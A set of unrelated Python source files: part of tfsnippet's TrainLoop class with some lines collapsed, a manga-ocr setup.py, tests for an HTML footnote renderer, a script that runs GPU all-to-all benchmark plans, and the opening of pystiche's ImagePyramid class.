    a :class:`CheckpointSaver`.
    """

    def __init__(self, epoch=0, step=0, best_valid_metric=None):
        self.epoch = epoch
        self.step = step
        self.best_valid_metric = best_valid_metric

    def get_state(self):
        return {
            'epoch': self.epoch,
            'step': self.step,
            'best_valid_metric': self.best_valid_metric,
        }

    def set_state(self, state):
        self.epoch = state['epoch']
        self.step = state['step']
        self.best_valid_metric = state['best_valid_metric']


class TrainLoop(DisposableContext):
    """
    Training loop object.

    This class provides a set of convenient methods for writing a training
    loop.  It is useful for maintaining epoch and step counters, logging
    training metrics, memorizing best parameters for early-stopping, etc.
    An example of using the :class:`TrainLoop`::

        import tfsnippet as spt

        with spt.TrainLoop(param_vars, max_epoch=10, early_stopping=True) as loop:
            loop.print_training_summary()
            train_flow = spt.DataFlow.arrays([x, y], batch_size, shuffle=True)

            for epoch in loop.iter_epochs():
                for step, (x, y) in loop.iter_steps(train_flow):
                    step_loss, _ = session.run(
                        [loss, train_op],
                        feed_dict={input_x: x, input_y: y}
                    )
                    loop.collect_metrics(loss=step_loss)
                with loop.timeit('valid_time'):
                    valid_loss = session.run(
                        loss, feed_dict={input_x: test_x, input_y: test_y})
                    loop.collect_metrics(valid_loss=valid_loss)
                loop.print_logs()

    The event schedule of a :class:`TrainLoop` can be briefly described as::

        # the main training loop
        events.fire(EventKeys.ENTER_LOOP, self)

        for epoch in self.iter_epochs():
            events.fire(EventKeys.BEFORE_EPOCH, self)

            for step in self.iter_steps(...):
                events.fire(EventKeys.BEFORE_STEP, self)

                ...  # execute the step

                events.reverse_fire(EventKeys.AFTER_STEP, self)

            events.reverse_fire(EventKeys.AFTER_EPOCH, self)

        events.fire(EventKeys.EXIT_LOOP, self)

        # when metrics are fed into the loop by :meth:`collect_metrics`
        def collect_metrics(self, metrics_dict=None, **kwargs):
            metrics_dict = merge(metrics_dict, kwargs)
            events.fire(EventKeys.METRICS_COLLECTED, self, metrics_dict)

        # when summaries are fed into the loop by :meth:`add_summary`
        def add_summary(self, summary):
            events.fire(EventKeys.SUMMARY_ADDED, self, summary)

        # when metric statistics have been printed as log
        def print_logs(self):
            ...
            events.fire(EventKeys.METRIC_STATS_PRINTED, self, metric_stats)
            events.fire(EventKeys.TIME_METRIC_STATS_PRINTED, self,
                        time_metric_stats)

    Warning:
        If you use early-stopping along with checkpoint, there is one case
        which is very dangerous: you've already successfully done a training
        loop, and the early-stopping variables have been restored.
        But you then recover from the latest checkpoint and continue to
        train.  In this case, the `param_vars` (which are covered by
        early-stopping) are restored to the best validation step, but the
        other variables and the internal states of :class:`TrainLoop` are
        recovered to the last step.  Then you obtain a state mismatch, and
        the behaviour will be unpredictable after this recovery.
    """

    def __init__(self,
                 param_vars,
                 var_groups=None,
                 show_eta=True,
                 print_func=print,
                 max_epoch=None,
                 max_step=None,
                 metric_formatter=DefaultMetricFormatter(),

                 # checkpoint related arguments
                 checkpoint_dir=None,
                 checkpoint_epoch_freq=None,
                 checkpoint_max_to_keep=None,
                 checkpoint_save_objects=None,
                 restore_checkpoint=True,

                 # summary related arguments
                 summary_dir=None,
                 summary_writer=None,
                 summary_graph=None,
                 summary_metric_prefix='metrics/',
                 summary_skip_pattern=re.compile(r'.*(time|timer)$'),
                 summary_commit_freqs=None,

                 # validation and early-stopping related arguments
                 valid_metric_name='valid_loss',
                 valid_metric_smaller_is_better=None,
                 early_stopping=False):
        """
        Construct the :class:`TrainLoop`.

        Args:
            param_vars (list[tf.Variable] or dict[str, tf.Variable]):
                List or dict of variables, optimized during training.
            var_groups (None or list[str]): Variable groups, the prefixes
                of variable scopes.  A hint for printing the variables
                summary. (default :obj:`None`)
            show_eta (bool): Whether or not to show ETA? (default :obj:`True`)
            print_func ((str) -> None): Function for printing log messages
                (calling ``print`` by default).  An alternative of this
                argument may be ``getLogger(__name__).info``, such that the
                log messages will be printed via logging facilities.
            max_epoch (None or int or tf.Tensor or tf.Variable): The maximum
                epoch to run.  If :obj:`None`, will run for infinite epochs.
                If ``1``, the epoch counter will be discarded in the output
                logs. (default :obj:`None`)
            max_step (None or int or tf.Tensor or tf.Variable): The maximum
                step to run.  If :obj:`None`, will run for infinite steps.
                Note this limit applies for the total step counter, rather
                than the epoch-wise step counter. (default :obj:`None`)
            metric_formatter (MetricFormatter): The training metrics
                formatter.
            checkpoint_dir (str): If specified, will save checkpoint files
                to this directory, when :meth:`make_checkpoint()` is called.
            checkpoint_epoch_freq (int or None): If specified, will make
                checkpoint every this number of epochs.  If not specified,
                you must call :meth:`make_checkpoint()` manually.
            checkpoint_max_to_keep (int or None): Maximum number of
                checkpoint versions to keep.  If :obj:`None` or `0`, keep
                all versions.
            checkpoint_save_objects (dict[str, CheckpointSavableObject]):
                If specified, will save and restore the states of these
                objects.
            restore_checkpoint (bool or str): If :obj:`True`, will restore
                the latest checkpoint.  If a str, it should be the path of
                a checkpoint file, and will restore from this checkpoint.
                If :obj:`False`, will not restore from the checkpoint files
                (but will still save new checkpoints if `checkpoint_dir`
                is specified).
            summary_dir (str): Directory for writing TensorFlow summaries.
                Ignored if `summary_writer` is specified.
            summary_writer: TensorFlow summary writer for writing metrics.
            summary_metric_prefix (str): The prefix for the metrics committed
                to `summary_writer`.  This will not affect the summaries
                added via :meth:`add_summary`. (default "metrics/")
            summary_graph: If specified, log the graph via `summary_writer`.
            summary_skip_pattern (str or regex): Metrics matching this
                pattern will be excluded from `summary_writer`.
(default ".*(time|timer)$") summary_commit_freqs (dict[str, int] or None): If specified, a metric will be committed to `summary_writer` no more frequent than ``summary_commit_freqs[metric]``. (default :obj:`None`) valid_metric_name (str): Name of the validation metric. valid_metric_smaller_is_better (bool): Whether or not the smaller value is better for validation metric? If not specified, it will be inferred according to `valid_metric_name`: metric names with ``acc`` or ``accuracy`` as suffix imply :obj:`True`, while other names imply :obj:`False`. early_stopping (bool): Whether or not to do early-stopping? (default :obj:`False`) If :obj:`True`, early-stopping will be applied on `param_vars`, according to the validation metric. The variables will only be restored if the training loop is exited without any error or interruption, including the Ctrl+C KeyboardInterrupt. """ # regularize the parameters if not isinstance(param_vars, (dict, OrderedDict)): param_vars = list(param_vars) if isinstance(max_epoch, (tf.Variable, tf.Tensor)): max_epoch = int(max_epoch.eval()) if isinstance(max_step, (tf.Variable, tf.Tensor)): max_step = int(max_step.eval()) if checkpoint_dir is not None: checkpoint_dir = os.path.abspath(checkpoint_dir) if checkpoint_epoch_freq is not None: checkpoint_epoch_freq = int(checkpoint_epoch_freq) if checkpoint_epoch_freq < 1: raise ValueError( '`checkpoint_epoch_freq` must be a positive integer: ' 'got {}'.format(checkpoint_epoch_freq) ) if isinstance(restore_checkpoint, six.string_types): if early_stopping: raise ValueError( 'Currently `early_stopping = True` is not supported when ' 'a file path is specified for `restore_checkpoint`.' ) restore_checkpoint = os.path.abspath(restore_checkpoint) save_objects = dict(checkpoint_save_objects or ()) for key in (TRAIN_LOOP_STATES_CKPT_NAME, EARLY_STOPPING_STATES_CKPT_NAME): if key in save_objects: raise KeyError('Name is reserved for `checkpoint_save_objects`' ': {}'.format(key)) if summary_writer is not None: summary_dir = None own_summary_writer = False elif summary_dir is not None: summary_dir = os.path.abspath(summary_dir) own_summary_writer = True else: own_summary_writer = False smaller_is_better = valid_metric_smaller_is_better if smaller_is_better is None: smaller_is_better = not ( valid_metric_name.endswith('acc') or valid_metric_name.endswith('accuracy') ) # memorize the parameters self._param_vars = copy.copy(param_vars) self._var_groups = list(var_groups) if var_groups else None self._print_func = print_func self._show_eta = show_eta self._max_epoch = max_epoch self._max_step = max_step self._metric_formatter = metric_formatter self._summary_dir = summary_dir self._summary_writer = summary_writer self._summary_metric_prefix = summary_metric_prefix self._summary_graph = summary_graph self._summary_skip_pattern = summary_skip_pattern self._summary_commit_freqs = dict(summary_commit_freqs or ()) self._own_summary_writer = own_summary_writer self._use_early_stopping = early_stopping self._valid_metric_name = valid_metric_name self._valid_metric_smaller_is_better = smaller_is_better # the event source self._events = EventSource([ EventKeys.ENTER_LOOP, EventKeys.EXIT_LOOP, EventKeys.BEFORE_EPOCH, EventKeys.AFTER_EPOCH, EventKeys.BEFORE_STEP, EventKeys.AFTER_STEP, EventKeys.METRICS_COLLECTED, EventKeys.TIME_METRICS_COLLECTED, EventKeys.METRIC_STATS_PRINTED, EventKeys.TIME_METRIC_STATS_PRINTED, EventKeys.SUMMARY_ADDED, ]) # the restorable train loop states self._states = TrainLoopStates() # initialize the checkpoint saver 
        self._checkpoint_dir = checkpoint_dir
        self._checkpoint_epoch_freq = checkpoint_epoch_freq
        self._restore_checkpoint = restore_checkpoint
        self._checkpoint_saver = None
        if checkpoint_dir:
            getLogger(__name__).debug(
                'Global variables to save at checkpoints: %s',
                tf.global_variables()
            )
            save_objects[TRAIN_LOOP_STATES_CKPT_NAME] = self._states
            self._checkpoint_saver = CheckpointSaver(
                tf.global_variables(),
                objects=save_objects,
                save_dir=os.path.join(checkpoint_dir, 'checkpoint'),
                max_to_keep=checkpoint_max_to_keep,
                save_meta=False
            )

        # the checkpoint saver for early stopping
        # if checkpoint_dir is None, we postpone the initialization until
        # enter the loop.
        self._early_stopping_saver = None
        self._early_stopping_temp_dir = None  # type: TemporaryDirectory
        if checkpoint_dir is not None and self._use_early_stopping:
            self._early_stopping_saver = CheckpointSaver(
                self._param_vars,
                save_dir=os.path.join(checkpoint_dir, 'early_stopping'),
                max_to_keep=2,
                save_meta=False
            )

        # ephemeral train loop states
        self._eta = None
        self._step_metrics = None  # type: MetricLogger
        self._epoch_metrics = None  # type: MetricLogger
        self._within_epoch = False
        self._within_step = False
        self._steps_per_epoch = None  # average steps per epoch
        self._is_best_valid_metric = False
        self._epoch_start_time = None
        self._step_start_time = None

        # the active data flow of current epoch
        self._data_flow = None  # type: DataFlow
        self._step_data = None  # the data of the current step

    def _enter(self):
        # open the summary writer if required
        if self._summary_dir is not None:
            self._summary_writer = tf.summary.FileWriter(
                self._summary_dir, graph=self._summary_graph)

        # create the metric accumulators
        self._step_metrics = MetricLogger(formatter=self._metric_formatter)
        self._epoch_metrics = MetricLogger(
            summary_writer=self._summary_writer,
            summary_metric_prefix=self._summary_metric_prefix,
            summary_skip_pattern=self._summary_skip_pattern,
            summary_commit_freqs=self._summary_commit_freqs,
            formatter=self._metric_formatter
        )

        # create the early-stopping saver if required
        if self._use_early_stopping:
            if self._early_stopping_saver is None:
                self._early_stopping_temp_dir = TemporaryDirectory()
                dir_path = self._early_stopping_temp_dir.__enter__()
                self._early_stopping_saver = CheckpointSaver(
                    self._param_vars,
                    save_dir=dir_path,
                    max_to_keep=2,
                    save_meta=False,
                )

        # restore the checkpoint
        if self._checkpoint_saver is not None:
            checkpoint_file = None
            if isinstance(self._restore_checkpoint, six.string_types):
                checkpoint_file = str(self._restore_checkpoint)
            elif self._restore_checkpoint:
                checkpoint_file = self._checkpoint_saver.latest_checkpoint()

            if checkpoint_file:
                self._checkpoint_saver.restore(checkpoint_file)
                self.println(
                    'Resume training: epoch {}, step {}, from checkpoint {}'.
                    format(self.epoch, self.step, checkpoint_file)
                )

        # initialize the eta flags
        self._eta = ETA(take_initial_snapshot=False)
        progress = self.get_progress()
        if progress is not None:
            self._eta.take_snapshot(progress)

        # trigger the event
        self.events.fire(EventKeys.ENTER_LOOP, self)

        # return self as the context object
        return self

    def _exit(self, exc_type, exc_val, exc_tb):
        try:
            # close the summary writer
            if self._own_summary_writer:
                self._summary_writer.close()
                self._summary_writer = None
                self._own_summary_writer = False

            # restore the early-stopping variables if no error
            if self._early_stopping_saver is not None:
                if exc_type is None:
                    es_latest = self._early_stopping_saver.latest_checkpoint()
                    if es_latest is None:  # pragma: no cover
                        warnings.warn(
                            'Early-stopping has never been triggered! '
                            'The variables will keep their latest values. '
                            'Did you forget to add corresponding metric?'
                        )
                    else:
                        self._early_stopping_saver.restore(es_latest)
                        self.println('Restore early-stopping parameters: '
                                     'from checkpoint {}'.format(es_latest))
                    self._early_stopping_saver = None
                else:  # pragma: no cover
                    warnings.warn(
                        'Early-stopping variables are not restored, because '
                        'an error or an interruption has occurred.'
                    )
        finally:
            try:
                if self._early_stopping_temp_dir is not None:
                    self._early_stopping_temp_dir.__exit__(
                        exc_type, exc_val, exc_tb
                    )
                    self._early_stopping_temp_dir = None
            except Exception:
                getLogger(__name__).warning(
                    'Failed to cleanup early-stopping temporary directory.',
                    exc_info=True
                )

        # clear status
        self._steps_per_epoch = None
        self._eta = None

        # trigger the event
        self.events.fire(EventKeys.EXIT_LOOP, self)

    def _commit_epoch_stop_time(self):
        if self._epoch_start_time is not None:
            duration = time.time() - self._epoch_start_time
            self.collect_metrics(metrics={EPOCH_TIME_METRIC: duration})
            self._epoch_start_time = None

    def _commit_step_stop_time(self):
        if self._step_start_time is not None:
            duration = time.time() - self._step_start_time
            self.collect_metrics(metrics={STEP_TIME_METRIC: duration})
            self._step_start_time = None

    def get_progress(self):
        """
        Get the progress of training.

        Returns:
            float or None: The progress in range ``[0, 1]``, or None if
                the progress cannot be estimated.
        """
        max_step = self.max_step
        if max_step is None and self.max_epoch is not None and \
                self._steps_per_epoch is not None:
            max_step = self.max_epoch * self._steps_per_epoch

        if max_step:
            if self._within_step and self._step_start_time is not None:
                # _step_start_time != None, indicating the step not finished
                return (self.step - 1.) / max_step
            else:
                return float(self.step) / max_step
        elif self.max_epoch is not None:
            if self._within_epoch and self._epoch_start_time is not None:
                # _epoch_start_time != None, indicating the epoch not finished
                return (self.epoch - 1.) / self.max_epoch
            else:
                return float(self.epoch) / self.max_epoch

    @property
    def param_vars(self):
        """Get the trainable parameter variables."""
        return self._param_vars

    @property
    def var_groups(self):
        """Get the variable groups."""
        return self._var_groups

    @property
    def max_epoch(self):
        """Get or set the max value for epoch counter."""
        return self._max_epoch

    @max_epoch.setter
    def max_epoch(self, value):
        self._max_epoch = int(value)

    @property
    def max_step(self):
        """Get or set the max value for global step counter."""
        return self._max_step

    @max_step.setter
    def max_step(self, value):
        self._max_step = int(value)

    @property
    def summary_writer(self):
        """Get the summary writer instance."""
        return self._summary_writer

    @property
    def events(self):
        """
        Get the event source.

        Returns:
            EventSource: The event source.
""" return self._events @property def epoch(self): """Get the epoch counter (starting from 1).""" return self._states.epoch @property def step(self): """Get the global step counter (starting from 1).""" return self._states.step @property def step_data(self): """Get the data of current step.""" return self._step_data @property def use_early_stopping(self): """Whether or not to adopt early-stopping?""" return self._use_early_stopping @property def valid_metric_name(self): """Get the name of the validation metric.""" return self._valid_metric_name @property def valid_metric_smaller_is_better(self): """Whether or not the smaller value is better for validation metric?""" return self._valid_metric_smaller_is_better @property def best_valid_metric(self): """Get the best valid metric.""" return self._states.best_valid_metric @property def within_epoch(self): """Whether or not an epoch is open?""" return self._within_epoch @property def within_step(self): """Whether or not a step is open?""" return self._within_step def make_checkpoint(self): """ Make a checkpoint. This method must be called within an eopch or a step context. For example:: for epoch in loop.iter_epochs(): for [x] in loop.iter_steps(train_data): ... if epoch % 100 == 0: loop.make_checkpoint() """ if not self._checkpoint_saver: raise RuntimeError('Checkpoint directory is not configured.') self._checkpoint_saver.save(self._states.step) def iter_epochs(self): """ Iterate through the epochs. This method can only be called when there's no other epoch loop is being iterated. Furthermore, after exiting this loop, both the epoch metrics as well as the step metrics will be cleared. If `max_epoch` is configured, it will stop at it. Yields: int: The epoch counter (starting from 1). """ def loop_condition(): return ( (self._max_epoch is None or self.epoch < self._max_epoch) and (self._max_step is None or self.step < self._max_step) ) self._require_entered() if self._within_epoch: raise RuntimeError('Another epoch loop has been opened') try: while loop_condition(): self._states.epoch += 1 self._within_epoch = True self._epoch_start_time = time.time() self.events.fire(EventKeys.BEFORE_EPOCH, self) yield self.epoch self.events.reverse_fire(EventKeys.AFTER_EPOCH, self) self._commit_epoch_stop_time() self._steps_per_epoch = float(self.step) / self.epoch # do checkpoint if configured if self._checkpoint_epoch_freq is not None and \ self.epoch % self._checkpoint_epoch_freq == 0: self.make_checkpoint() finally: self._within_epoch = False self._epoch_start_time = None self._step_metrics.clear() self._epoch_metrics.clear() self._is_best_valid_metric = False def iter_steps(self, data_generator=None): """ Iterate through the steps. This method can only be called when there's no other step loop is being iterated, and an epoch loop is active. Args: data_generator: Optional iterable data to be yielded at every step. This is required if `max_step` is not configured, so as to prevent an infinite step loop. Yields: int or (int, any): The global step counter (starting from 1), or the tuple of ``(step counter, batch data)`` if `data_generator` is specified. 
""" def loop_condition(): return self._max_step is None or self.step < self._max_step self._require_entered() if not self._within_epoch: raise RuntimeError('Step loop must be opened within active epoch ' 'loop') if self._within_step: raise RuntimeError('Another step loop has been opened') if self._max_step is None and data_generator is None: raise RuntimeError('`data_generator` is required when `max_step` ' 'is not configured, so as to prevent an ' 'unstoppable step loop') try: if data_generator is not None: if isinstance(data_generator, DataFlow): data_flow = data_generator else: def iter_factory(): if data_gen[0] is not None: for batch in data_gen[0]: yield batch data_gen[0] = None # force to use data_generator once data_gen = [data_generator] data_flow = DataFlow.iterator_factory(iter_factory) self._data_flow = data_flow while loop_condition(): # prepare for the step data if self._data_flow is None: yield_obj = self.step + 1 step_data = None else: try: step_data = self._data_flow.next_batch() except StopIteration: break yield_obj = self.step + 1, step_data # yield this step self._states.step += 1 self._within_step = True self._step_data = step_data self._step_start_time = time.time() self.events.fire(EventKeys.BEFORE_STEP, self) try: yield yield_obj except StopIteration: # pragma: no cover # might be caused by call to ``data_flow.next_batch()`` break self.events.reverse_fire(EventKeys.AFTER_STEP, self) self._commit_step_stop_time() finally: self._within_step = False self._step_start_time = None self._data_flow = None self._step_data = None def _require_context(self): self._require_entered() if not self._within_epoch and not self._within_step: raise RuntimeError('An epoch or a step loop is expected, but ' 'neither has been opened') @contextmanager def timeit(self, metric_name): """ Open a context for timing. Args: metric_name (str): Store the timing result in metric of this name. Note that `metric_name` must end with ``time`` or ``timer``, otherwise by default the time values will not be formatted as human readable strings. """ self._require_context() start_time = time.time() yield duration = time.time() - start_time self._collect_metrics( {metric_name: duration}, EventKeys.TIME_METRICS_COLLECTED) @contextmanager def metric_collector(self, metric_name): """ Get a :class:`~tfsnippet.utils.StatisticsCollector` for metric. The mean value of the collected metrics will be added to summary after exiting the context. Other statistics will be discarded. Args: metric_name (str): The name of this metric. Yields: StatisticsCollector: The collector for metric values. 
""" self._require_context() acc = StatisticsCollector() yield acc if acc.has_value: self.collect_metrics(metrics={metric_name: acc.mean}) def _collect_metrics(self, metrics, event_key): self._require_context() # update the metrics self._epoch_metrics.collect_metrics(metrics, global_step=self.step) if self._within_step: self._step_metrics.collect_metrics(metrics, global_step=self.step) self.events.fire(event_key, self, metrics) # update the validation metric def update_valid_metric(d): v = d.get(self.valid_metric_name) if v is not None: if self.best_valid_metric is None or \ (self._valid_metric_smaller_is_better and v < self.best_valid_metric) or \ (not self._valid_metric_smaller_is_better and v > self.best_valid_metric): # we've met a new best metric self._states.best_valid_metric = v self._is_best_valid_metric = True # early-stopping save variables if self._early_stopping_saver is not None: self._early_stopping_saver.save(global_step=self.step) else: self._is_best_valid_metric = False if self.valid_metric_name: if metrics: update_valid_metric(metrics) def collect_metrics(self, metrics=None, **kwargs): """ Add metric values. This method must be called when there's at least an active epoch loop. It will add metrics to the epoch metrics collector, and if there's an active step loop, it will also add metrics to the step metrics collector. If `summary_writer` is configured, it will also write the metrics as summaries onto disk. Furthermore, if `valid_metric_name` is configured, it will also perform early-stopping. Args: metrics (dict[str, float or np.ndarray]): Metric values as dict. **kwargs: Metric values, specified as named arguments. """ if metrics is None: metrics = {} elif metrics is not None and not isinstance(metrics, dict): raise TypeError('`metrics` should be a dict') else: metrics = dict(metrics) metrics.update(kwargs) self._collect_metrics(metrics, EventKeys.METRICS_COLLECTED) def add_summary(self, summary): """ Add a summary object, with ``self.step`` as `global_step`. Args: summary (tf.summary.Summary or bytes): TensorFlow summary object, or serialized summary. """ self._require_entered() self._summary_writer.add_summary(summary, global_step=self.step) self.events.fire(EventKeys.SUMMARY_ADDED, self, summary) def get_eta(self): """ Get the estimated time ahead (ETA). Returns: float or None: The estimated time ahead in seconds, or None if not available. """ progress = self.get_progress() if progress is not None: return self._eta.get_eta(progress) def println(self, message, with_tag=False): """ Print `message` via `print_function`. Args: message (str): Message to be printed. with_tag (bool): Whether or not to add the epoch & step tag? (default :obj:`False`) """ if with_tag: def format_tag(v, max_v, name): if max_v is not None: return '{} {}/{}'.format(name, v, max_v) else: return '{} {}'.format(name, v) if not self._within_step and not self._within_epoch: self._require_context() tags = [] if self._max_epoch != 1: tags.append(format_tag(self.epoch, self._max_epoch, 'Epoch')) tags.append(format_tag(self.step, self._max_step, 'Step')) if self._show_eta: eta = self.get_eta() if eta is not None: tags.append('ETA {}'.format(humanize_duration(eta))) message = '[{}] {}'.format(', '.join(tags), message) self._print_func(message) def print_training_summary(self): """ Print the training summary. The training summary include the following content: 1. Execution environment. 2. Parameters to be optimized during training. 
""" self._require_entered() self.println(summarize_variables( variables=self._param_vars, title='Trainable Parameters', other_variables_title='Other Parameters', groups=self.var_groups )) self.println('') def print_logs(self): """ Print the training logs. This method will print the collected metrics. If there's an active step loop, it will print metrics from the step metrics collector. Otherwise if there's only an epoch loop, it will print metrics from the epoch metrics accumulator. Note it must be called at the end of an epoch or a step. This is because the metrics of corresponding loop context will be cleared after the logs are printed. Moreover, the epoch or step timer will be committed as metric immediately when this method is called, before printing the logs. """ self._require_entered() metrics = None if self._within_step: self._commit_step_stop_time() metrics = self._step_metrics elif self._within_epoch: self._commit_epoch_stop_time() metrics = self._epoch_metrics else: self._require_context() best_mark = ' (*)' if self._is_best_valid_metric else '' self.println(metrics.format_logs() + best_mark, with_tag=True) self._is_best_valid_metric = False # fire the metric stats printed events metric_stats = { key: val for key, val in six.iteritems(metrics.metrics) if not TIME_METRIC_PATTERN.match(key) } time_metric_stats = { key: val for key, val in six.iteritems(metrics.metrics) if TIME_METRIC_PATTERN.match(key) } if metric_stats: self.events.fire( EventKeys.METRIC_STATS_PRINTED, self, metric_stats) if time_metric_stats: self.events.fire( EventKeys.TIME_METRIC_STATS_PRINTED, self, time_metric_stats) metrics.clear()
439247
from pathlib import Path from setuptools import setup long_description = (Path(__file__).parent / "README.md").read_text('utf-8').split('# Installation')[0] setup( name="manga-ocr", version='0.1.7', description="OCR for Japanese manga", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/kha-white/manga-ocr", author="<NAME>", author_email="<EMAIL>", license="Apache License 2.0", classifiers=[ "Programming Language :: Python :: 3", ], packages=['manga_ocr'], include_package_data=True, install_requires=[ "fire", "fugashi", "jaconv", "loguru", "numpy", "Pillow", "pyperclip", "torch>=1.0", "transformers>=4.12.5", "unidic_lite", ], entry_points={ "console_scripts": [ "manga_ocr=manga_ocr.__main__:main", ] }, )
439291
from mau.visitors.html_visitor import HTMLVisitor from mau.parsers import nodes from mau.parsers.main_parser import MainParser from tests.helpers import ( dedent, remove_indentation, init_parser_factory, visitlist_factory, ) init_parser = init_parser_factory(MainParser) visitlist = visitlist_factory(HTMLVisitor) def test_footnote(): v = HTMLVisitor() result = v.visit( { "type": "footnote_ref", "number": 6, "refanchor": "refXYZ", "defanchor": "defXYZ", } ) assert result == '<sup>[<a id="refXYZ" href="#defXYZ">6</a>]</sup>' def test_footnote_definition(): v = HTMLVisitor() node = { "type": "footnote_def", "number": 1, "refanchor": "refXYZ", "defanchor": "defXYZ", "content": [ { "type": "sentence", "content": [ {"type": "text", "value": "Some text 1"}, ], } ], } v._visit_footnote_def(node) assert node == { "type": "footnote_def", "defanchor": "defXYZ", "number": 1, "refanchor": "refXYZ", "content": "Some text 1", } def test_footnotes(): v = HTMLVisitor() nodes = [ { "type": "footnote_def", "number": 1, "refanchor": "refXYZ1", "defanchor": "defXYZ1", "content": [ { "type": "sentence", "content": [ {"type": "text", "value": "Some text 1"}, ], } ], }, { "type": "footnote_def", "number": 2, "refanchor": "refXYZ2", "defanchor": "defXYZ2", "content": [ { "type": "sentence", "content": [ {"type": "text", "value": "Some text 2"}, ], } ], }, ] result = v._render( "footnotes", entries="".join([v.visit(i) for i in nodes]), ) assert result == remove_indentation( """ <div id="_footnotes"> <div id="defXYZ1"> <a href="#refXYZ1">1</a> Some text 1 </div> <div id="defXYZ2"> <a href="#refXYZ2">2</a> Some text 2 </div> </div> """ ) def test_command_footnotes(): footnotes = nodes.FootnotesNode( entries=[ nodes.FootnoteDefNode( 1, "refXYZ1", "defXYZ1", [nodes.SentenceNode([nodes.TextNode("Some text 1")])], ), nodes.FootnoteDefNode( 2, "refXYZ2", "defXYZ2", [nodes.SentenceNode([nodes.TextNode("Some text 2")])], ), ] ) parser = init_parser("::footnotes:") parser.parse() result = visitlist([node.asdict() for node in parser.nodes], footnotes=footnotes) assert result == [ remove_indentation( """ <div id="_footnotes"> <div id="defXYZ1"> <a href="#refXYZ1">1</a> Some text 1 </div> <div id="defXYZ2"> <a href="#refXYZ2">2</a> Some text 2 </div> </div> """ ) ] def test_footnotes_generation_without_footnote_definitions(): source = dedent( """ ::footnotes: """ ) parser = init_parser(source) parser.parse() result = visitlist( [node.asdict() for node in parser.nodes], footnotes=parser.footnotes ) assert result == ["""<div id="_footnotes"></div>"""]
439459
import sys import subprocess import argparse import os import signal from pathlib import Path parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("arch", type=str, help="architecture (dgx1|dgx2)") parser.add_argument("--dir", type=str, help="output directory", default=".") parser.add_argument("--python", type=str, help="python interpreter", default="python3") args = parser.parse_args() if args.dir.endswith('/'): args.dir = args.dir[:-1] # args.arch has to be one of the following options types = ["dgx1", "dgx2"] assert(args.arch in types) base_path = str(Path(__file__).parent.parent.resolve()) # relevant plans for DGX-1 topology dgx1_plans = [ base_path + "/plans/dgx1_direct/all2all_plan.json", base_path + "/plans/dgx1_opt/all2all_plan.json", base_path + "/plans/dgx1_rings/all2all_plan.json" ] # relevant plans for DGX-2 topology dgx2_plans = [ base_path + "/plans/dgx2_direct/all2all_plan.json", base_path + "/plans/dgx2_opt/all2all_plan.json" ] plans = {"dgx1": dgx1_plans, "dgx2": dgx2_plans} # mkdir if not os.path.exists(args.dir): os.makedirs(args.dir) # make sure subprocesses return at SIGINT def signal_handler(signal, frame): sys.exit(0) signal.signal(signal.SIGINT, signal_handler) for i, plan in enumerate(plans[args.arch]): print("PROGRESS: plan " + str(i+1) + "/" + str(len(plans[args.arch]))) plan_label = plan.split('/')[-2] print("\tall2all") p1 = subprocess.Popen([args.python, base_path + "/benchmark/benchmark_plan.py", "all2all", plan, "-o", args.dir + "/" + plan_label + "_all2all.csv"]).wait() print("\tall2all_async") p2 = subprocess.Popen([args.python, base_path + "/benchmark/benchmark_plan.py", "all2all_async", plan, "-o", args.dir + "/" + plan_label + "_all2all_async.csv"]).wait() if p1 or p2: print("ERROR: subprocess terminated with non-zero exit code") sys.exit(1) subprocess.Popen([args.python, base_path + "/benchmark/plot_results.py", "-o", args.dir + "/" + args.arch + "_all2all_benchmark.pdf", args.dir + "/*"]).wait()
439500
from math import floor, log2
from typing import (
    Any,
    Collection,
    Dict,
    Iterator,
    Optional,
    Sequence,
    Set,
    Tuple,
    Union,
)

from pystiche import ComplexObject, loss
from pystiche.misc import zip_equal

from .level import PyramidLevel
from .storage import ImageStorage

__all__ = ["ImagePyramid", "OctaveImagePyramid"]


class ImagePyramid(ComplexObject):
    r"""Image pyramid for a coarse-to-fine optimization on different levels.

    When iterated over, it yields :class:`~pystiche.pyramid.PyramidLevel` objects and
    handles the resizing of all set images and guides of ``resize_targets``.

    Args:
        edge_sizes: Edge sizes for each level.
        num_steps: Number of steps for each level. If sequence of ``int`` its length
            has to match the length of ``edge_sizes``.
        edge: Corresponding edge to the edge size for each level. Can be ``"short"`` or
            ``"long"``. If sequence of ``str`` its length has to match the length of
            ``edge_sizes``. Defaults to ``"short"``.
        interpolation_mode: Interpolation mode used for the resizing of the images.
            Defaults to ``"bilinear"``.

            .. note::
                For the resizing of guides ``"nearest"`` is used regardless of the
                ``interpolation_mode``.
        resize_targets: Targets for resizing of set images and guides during iteration.
    """

    def __init__(
        self,
        edge_sizes: Sequence[int],
        num_steps: Union[Sequence[int], int],
        edge: Union[Sequence[str], str] = "short",
        interpolation_mode: str = "bilinear",
        resize_targets: Collection[loss.Loss] = (),
    ):
        self._levels = self.build_levels(edge_sizes, num_steps, edge)

        self.interpolation_mode = interpolation_mode
        self._resize_targets = set(resize_targets)

    @staticmethod
    def build_levels(
        edge_sizes: Sequence[int],
        num_steps: Union[Sequence[int], int],
        edge: Union[Sequence[str], str],
    ) -> Tuple[PyramidLevel, ...]:
        num_levels = len(edge_sizes)
        if isinstance(num_steps, int):
            num_steps = [num_steps] * num_levels
        if isinstance(edge, str):
            edge = [edge] * num_levels

        return tuple(
            PyramidLevel(edge_size, num_steps_, edge_)
            for edge_size, num_steps_, edge_ in zip_equal(edge_sizes, num_steps, edge)
        )

    # TODO: can this be removed?
    def add_resize_target(self, loss: loss.Loss) -> None:
        self._resize_targets.add(loss)

    def __len__(self) -> int:
        return len(self._levels)

    def __getitem__(self, idx: int) -> PyramidLevel:
        return self._levels[idx]

    def __iter__(self) -> Iterator[PyramidLevel]:
        image_storage = ImageStorage(self._resize_losses())
        for level in self._levels:
            try:
                self._resize(level)
                yield level
            finally:
                image_storage.restore()

    def _resize(self, level: PyramidLevel) -> None:
        for loss_ in self._resize_losses():
            if isinstance(loss_, loss.ComparisonLoss):
                if loss_.target_image is not None:
                    resized_image = level.resize_image(
                        loss_.target_image, interpolation_mode=self.interpolation_mode
                    )
                    resized_guide = (
                        level.resize_guide(loss_.target_guide)
                        if loss_.target_guide is not None
                        else None
                    )
                    loss_.set_target_image(resized_image, guide=resized_guide)

            if loss_.input_guide is not None:
